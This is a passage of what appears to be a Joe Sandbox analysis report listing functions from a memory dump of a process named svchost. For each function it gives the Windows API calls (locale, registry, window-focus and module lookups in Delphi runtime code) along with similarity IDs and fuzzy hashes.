                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 03E37245
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                    • Opcode ID: cbb5155528f5a7dd699de107d61d5b09b3ba6fb9aa162e446fbf0c0326b4b028
                                                                                                                                                                    • Instruction ID: 3c1523f4629d0984b433b4ae6d96438be50c8988c71521e05429f151a3e9ebdc
                                                                                                                                                                    • Opcode Fuzzy Hash: cbb5155528f5a7dd699de107d61d5b09b3ba6fb9aa162e446fbf0c0326b4b028
                                                                                                                                                                    • Instruction Fuzzy Hash: EB115EBA108304AED300F7A6CC89F9F77EC6B46600F402715B354EB0D1DA31E904CB62
                                                                                                                                                                    Function 03E38904 Relevance: 10.5, APIs: 7, Instructions: 38threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32(00000000), ref: 03E3890F
                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 03E38915
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E38923
                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,000000FF), ref: 03E38929
                                                                                                                                                                    • SetFocus.USER32(?,00000000,03E3896A,?,00000000,?,000000FF), ref: 03E38940
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E3895E
                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,03E38971,03E3896A,?,00000000,?,000000FF), ref: 03E38964
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Thread$AttachCurrentInputWindow$FocusForegroundProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 440050021-0
                                                                                                                                                                    • Opcode ID: 97a5b05f015d2545fdbaa4c5066f72880a4098adf0221d545ad36ad8355a1a9f
                                                                                                                                                                    • Instruction ID: f37236d34e7aade5542e2b6c436e5c32141005d5a9f8255d9afe1cd80713c6fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 97a5b05f015d2545fdbaa4c5066f72880a4098adf0221d545ad36ad8355a1a9f
                                                                                                                                                                    • Instruction Fuzzy Hash: C2F01279E04344BEDB11EBF68C1996E77ACDB4A620F525660B520EB5C0D6359910CA11
                                                                                                                                                                    Function 03E398F4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 03E398FD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SwitchToThisWindow), ref: 03E39914
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 03E39927
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: ChangeWindowMessageFilter$SwitchToThisWindow$user32.dll
                                                                                                                                                                    • API String ID: 667068680-2021927898
                                                                                                                                                                    • Opcode ID: e0b07087b98671536b5b0a5974167c5832d19c11267e81405a5b0331923a73a5
                                                                                                                                                                    • Instruction ID: c147dba891d3fd90cba0090a9a5d85f2cc44bd22ff7f8da3b8010a8c055991db
                                                                                                                                                                    • Opcode Fuzzy Hash: e0b07087b98671536b5b0a5974167c5832d19c11267e81405a5b0331923a73a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF01CB2905308EEDB00FFBBA94D69A77F8DB01514B141695E0189B251E7B06900CB10
                                                                                                                                                                    Function 03E31ABC Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(Function_0000D5C4,00000000,03E31BB0), ref: 03E31AEB
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,03E31BB0), ref: 03E31AFD
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,03E31BB0), ref: 03E31B21
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00008000,00000000,00000000,03E31BB0), ref: 03E31B72
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0000D5C4,03E31BB7,00000000,00000000,03E31BB0), ref: 03E31BA0
                                                                                                                                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0000D5C4,03E31BB7,00000000,00000000,03E31BB0), ref: 03E31BAA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3782394904-0
                                                                                                                                                                    • Opcode ID: f743af0b18dfa3ed5a23374cd2d53fc59de07804623018730f6baf2c0fec996d
                                                                                                                                                                    • Instruction ID: 3d35fc62428985e93368d40339bec51adcb72c6fc1f370d370a503e3d59f8d60
                                                                                                                                                                    • Opcode Fuzzy Hash: f743af0b18dfa3ed5a23374cd2d53fc59de07804623018730f6baf2c0fec996d
                                                                                                                                                                    • Instruction Fuzzy Hash: CC214C74A08748EFDB11FBA9D84DB9ABBF4EB0B708F146399E4009B690D6749940EF14
                                                                                                                                                                    Function 03E34ABD Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E32F6C: GetKeyboardType.USER32(00000000), ref: 03E32F71
                                                                                                                                                                      • Part of subcall function 03E32F6C: GetKeyboardType.USER32(00000001), ref: 03E32F7D
                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 03E34B23
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 03E34B37
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 03E34B48
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E34B84
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FBE
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FF1
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegCloseKey.ADVAPI32(?,03E33014,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E33007
                                                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 03E34B64
                                                                                                                                                                      • Part of subcall function 03E349F4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,03E34A5A), ref: 03E34A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3734044017-0
                                                                                                                                                                    • Opcode ID: 53797f057a0c22b2cb5a3e06c843ef645a830fe852788c73a455ebf0b56772e8
                                                                                                                                                                    • Instruction ID: 84ca3d71978bd75236454497937b683ce17718ecdedec2366af0cedc1e414135
                                                                                                                                                                    • Opcode Fuzzy Hash: 53797f057a0c22b2cb5a3e06c843ef645a830fe852788c73a455ebf0b56772e8
                                                                                                                                                                    • Instruction Fuzzy Hash: C40180A9408399D9DB11FF73988D3DA3A61AF13744F14775D80405E399E7394145CF62
                                                                                                                                                                    Function 03E32F9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FBE
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FF1
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,03E33014,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E33007
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                    • Opcode ID: abdd756626b98141ef79555a4a9e903fb89b7fcf554bb413a63df564a6c36b09
                                                                                                                                                                    • Instruction ID: 0b51058467841b43481f4048a692edef5fe58c0adc2c92cc9826cbe294de9c68
                                                                                                                                                                    • Opcode Fuzzy Hash: abdd756626b98141ef79555a4a9e903fb89b7fcf554bb413a63df564a6c36b09
                                                                                                                                                                    • Instruction Fuzzy Hash: D201D87D900348BEDB21EBD0CD46FEDB7BCDB05B00F1002A5BA14E7580E6759510DB64
                                                                                                                                                                    Function 03E39A3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FA), ref: 03E39A63
                                                                                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,Shell_TrayWnd,0000000D,?,?,000000FA), ref: 03E39A84
                                                                                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,SysPager,00000008,00000400,00000001,?,?,Shell_TrayWnd,0000000D,?,?,000000FA), ref: 03E39AA7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$ClassName
                                                                                                                                                                    • String ID: Shell_TrayWnd$SysPager
                                                                                                                                                                    • API String ID: 3699413841-3765525915
                                                                                                                                                                    • Opcode ID: c17d1d1da51cbf3787cbf987cdfcfaff9ab4153940c553da0955b7c6d01a1480
                                                                                                                                                                    • Instruction ID: 00069a737dee63874101f19799a1c6f76ac489f8a4032fc20c6a90f7ec0dbf3e
                                                                                                                                                                    • Opcode Fuzzy Hash: c17d1d1da51cbf3787cbf987cdfcfaff9ab4153940c553da0955b7c6d01a1480
                                                                                                                                                                    • Instruction Fuzzy Hash: C901FF75A44248BADB20DBD48C46FEEB3B89B16700F045391BA55EB281D7F15A40DF51
                                                                                                                                                                    Function 03E36D1C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,03E36DB3,?,?,00000000), ref: 03E36D34
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,03E36DB3,?,?,00000000), ref: 03E36D64
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_00006C68,00000000,00000000,00000004), ref: 03E36D6F
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,03E36DB3,?,?,00000000), ref: 03E36D8D
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_00006CA4,00000000,00000000,00000003), ref: 03E36D98
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                    • Opcode ID: 5d39138ffed0c839060dd5c20a5f9f7424df2c91f11e5e54be7d0ba1c5ddcd7c
                                                                                                                                                                    • Instruction ID: c18e671fefcf49bc0f80f41af5e7b6a064c5f52ce06e6a89e98e2f41db562524
                                                                                                                                                                    • Opcode Fuzzy Hash: 5d39138ffed0c839060dd5c20a5f9f7424df2c91f11e5e54be7d0ba1c5ddcd7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D01D479240708BED301F6B5CC4AF6E35ACDB43B20F912760E410EF6C4D6749E00C565
                                                                                                                                                                    Function 03E36DDD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,03E36F96,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 03E36DFB
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                    • Opcode ID: 14d6f72e47e31ad80f3850b647f5c5795d0be09a12afd98d1bb5a56a5216af1d
                                                                                                                                                                    • Instruction ID: 2fb384a9f4030cdf0cf1a7b7de5609c51799bd426788a2b4cfb5c07382dd32d7
                                                                                                                                                                    • Opcode Fuzzy Hash: 14d6f72e47e31ad80f3850b647f5c5795d0be09a12afd98d1bb5a56a5216af1d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8941AF29704A056BC711EF79C8DC6FEF2B6EB87204FA43765E442AB344D725EA06C621
                                                                                                                                                                    Function 03E38270 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,03E38781,00000000,03E38794), ref: 03E38276
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 03E38287
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                    • Opcode ID: 5243a68da49ee02dec8a8eee4c44b36ac3ceca18a1e888b946e1f5c1a1aa7be9
                                                                                                                                                                    • Instruction ID: c772fcede3d97a74f2403b57cf9933309ea2282838aeba1dad66a5d82c52b219
                                                                                                                                                                    • Opcode Fuzzy Hash: 5243a68da49ee02dec8a8eee4c44b36ac3ceca18a1e888b946e1f5c1a1aa7be9
                                                                                                                                                                    • Instruction Fuzzy Hash: 44D05EB220979A4EDB00EAA7D8CCB9621689F4B104B313324F43479141EA74C4ACCA00
                                                                                                                                                                    Function 03E37000 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: b3074ffe284d91f638c87374c6f4ffbe122223c615cfe0f3de58067210485ebd
                                                                                                                                                                    • Instruction ID: 6e16f87477f7161afbbd5de9e1da26f42304bf98b05db50a54c1d7656fc6333c
                                                                                                                                                                    • Opcode Fuzzy Hash: b3074ffe284d91f638c87374c6f4ffbe122223c615cfe0f3de58067210485ebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 1141FEB5A0025C9FDB21EB69CC88BDEB7F9AB0A304F4452E5A508EB241D7749F84CF51
                                                                                                                                                                    Function 03E36FFE Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: c6005ed739661d01dea6441276eca1a3294f204f60782bacfa3415bf0da49b01
                                                                                                                                                                    • Instruction ID: e9c791cc88252ee74d97494cb11d79ca95c7573d2605a7727a1b0ddca8fdf16e
                                                                                                                                                                    • Opcode Fuzzy Hash: c6005ed739661d01dea6441276eca1a3294f204f60782bacfa3415bf0da49b01
                                                                                                                                                                    • Instruction Fuzzy Hash: 09411DB5A0025C9FDB21EB69CC88BDEB7F9AB0A204F4452E5A508EB241D7749F84CF51
                                                                                                                                                                    Function 03E37D24 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStringTypeA.KERNEL32(00000809,00000002,?,00000080,?), ref: 03E37E1E
                                                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 03E37D4E
                                                                                                                                                                      • Part of subcall function 03E37CAC: GetCPInfo.KERNEL32(00000000,?), ref: 03E37CC5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocaleStringThreadType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1505017576-0
                                                                                                                                                                    • Opcode ID: c70e154ea09bcc56bd44360409151a74330964548f19a32559b5f9b660e9ee15
                                                                                                                                                                    • Instruction ID: 8a3635915a1a97aaf4e60be28f549a06e74f8ee2f72af26dfd71c7dd739c9626
                                                                                                                                                                    • Opcode Fuzzy Hash: c70e154ea09bcc56bd44360409151a74330964548f19a32559b5f9b660e9ee15
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F3107A15013A8DAD722EB77AC0D3A777F8EB83208F485359D5848F2C5DB354844CB61
                                                                                                                                                                    Function 03E39238 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 03E39266
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 03E39273
                                                                                                                                                                    • GetModuleHandleExA.KERNEL32(00000006,03E39238,?,00000000,?), ref: 03E39283
                                                                                                                                                                    • GetLastError.KERNEL32(00000006,03E39238,?,00000000,?), ref: 03E392A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$HandleModule
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1090667551-0
                                                                                                                                                                    • Opcode ID: 2487f92d6b94e1f8fe7daf521ec0e26ce1a6626155e602586cd1e3c906f4f952
                                                                                                                                                                    • Instruction ID: 1177c059057d9c621da7baba1877315f62e829791363815a48b1181736406eb0
                                                                                                                                                                    • Opcode Fuzzy Hash: 2487f92d6b94e1f8fe7daf521ec0e26ce1a6626155e602586cd1e3c906f4f952
